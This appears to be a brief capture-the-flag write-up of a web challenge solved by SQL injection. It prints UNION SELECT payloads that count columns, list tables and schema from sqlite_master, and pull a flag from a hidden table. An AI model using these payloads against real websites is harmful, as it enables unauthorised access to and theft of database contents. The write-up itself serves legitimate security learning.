![0bd963e0fab023ef6bb3bea67eadffb1.png](1898eb258da44020aa863cdea27ac4d9.png) ![a4b435766bae96b5758d0f72fa66e951.png](24f9cbc23aa543d3b209037b95fec9e4.png) This felt sql-y to me immediately. Can we break it? ![2cb3cd7007280a5bb1d8e7d384199e50.png](03293b0cc3574e8b998ce620e487454c.png) Sure can Let's try some unions and see if we can pull some info. Trial and error, I found that there are 3 columns ``` ' union select 1,2,3-- - ``` ![f05c577c85d1a5666c3dd18972d9377a.png](73ae87e2e2c9491cafcafde5b1bd0390.png) Pulling the table names ``` ' union select 1,2,tbl_name FROM sqlite_master;-- - ``` ![4a84f8151e0ddef877149468c5024de7.png](eb9ef731fa514464a9a7d274c74b1ede.png) And enumerating the columns ``` ' union select 1,2,sql FROM sqlite_master;-- - ``` ![a8c10e5b97f2052140ff548cb2366cf5.png](1b3c7ed17882412596a6139d6bd6cc12.png) Now to grab the data we want ``` ' union select 1,flag,link FROM hidden;-- -' ``` ![f371f6f2b411eff475d26a63f03a09fa.png](64f9f66a77b644a2a52e31394650c7d5.png) ![d3bfbfa84de6efdf5c82205d501e3b1f.png](591ef90465d944d5abdbd9328ca4fdfc.png) And the flag ![d42ac7adad61696cb81ac2de4cc58f29.png](baf313f12172468fb7b7f183edd32ef1.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #sqlinjection Related: